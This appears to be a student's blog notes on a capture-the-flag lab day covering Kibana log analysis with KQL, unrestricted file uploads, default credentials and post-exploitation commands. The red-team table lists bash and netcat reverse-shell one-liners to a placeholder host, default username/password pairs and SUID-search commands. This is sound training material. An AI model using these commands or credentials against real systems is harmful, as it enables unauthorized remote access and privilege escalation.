Post 63 - Twice in three days
Task 9, Day 3 Log analysis Even if I wanted to go, their vulnerabilities wouldn’t allow it.
Operation Blue
Log analysis is crucial to blue-team work.
- ELK: Elasticsearch, Logstash, and Kirbana
ELK combines data analytics and processing tools to make log analysis manageable. Forms dedicated stack to aggregate logs from multiple sources into central place. Today starts with Kibana Discover interface.
- Index pattern: Collection of logs. Could be from single host or multiple hosts with similar purpose, i.e. web servers.
- KQL: Kibana Query Language - Language for searching documents for values. Semi-similar to Splunks SPL (Search Processing Language).
| Query/Syntax | Description | Example |
|---|---|---|
| ” “ | Search for specific values. Exact search. | “TryHackMe” |
| ** | Wildcard for similar matches to value provided | United** (returns United Kingdom and United States) |
| OR | Shows documents that contain either value provided | “United Kingdom” OR “England” |
| AND | Shows documents that contain both values provided | “Ben” AND “25” |
| : | Search a specific field in the document. Field availability depends on fields available in document. | ip.address: 10.10.10.10 |
Can filter out noise by selecting/unselecting certain fields. Adding fields just applies correct KQL syntax through GUI. Can also filter specific values in fields by clicking field in left pane and adding/removing with +/-. Can click and drag on timeline to select time covered in search.
Operation Red
Unrestricted File Uploads
Without the website confirming things like file type, size, file contents it can open door for attacks on webserver.
- RCE: Uploading a script that the server runs giving control to the attacker.
- XSS: Uploading HTML file containing XSS code to steal a cookie and send it back to attacker’s server.
Usage of Weak Credentials
One of the easiest paths of attack is weak or default creds. Common weak.default creds attacker might try:
| Username | Password |
|---|---|
| admin | admin |
| administrator | administrator |
| admin@domainname | admin |
| guest | guest |
RCE and Web Shells
Post vulnerability exploitation commands to try:
| Command | Use |
|---|---|
| ls | Gives idea of files and directories around you |
| cat | Outputs contents of documents like text files |
| pwd | Gives idea of where in system you are |
| whoami | Lets you know who you are |
| hostname | System name and potentially its role |
| uname -a | System info like OS, kernel version, etc. |
| id | Shows any groups current user is assigned to |
| ifconfig | Network setup info |
| bash -i >& /dev/tcp/<your-ip>/<port> 0>&1 | Begins reverse shell via bash |
| nc -e /bin/sh <your-ip> <port> | Begin reverse shell via Netcat |
| find / -perm -4000 -type f 2>/dev/null | Finds SUID files, useful for privesc |
| find / -writable -type f 2>/dev/null | grep -v “/proc/” | Find files with writable permissions |
The Task
Investigate attack in Kibana to answer blues questions, then recreate attack to answer red questions. Had to watch the end of the video to get my shell going.
Recommended Stuff
Advanced ELK queries room(?).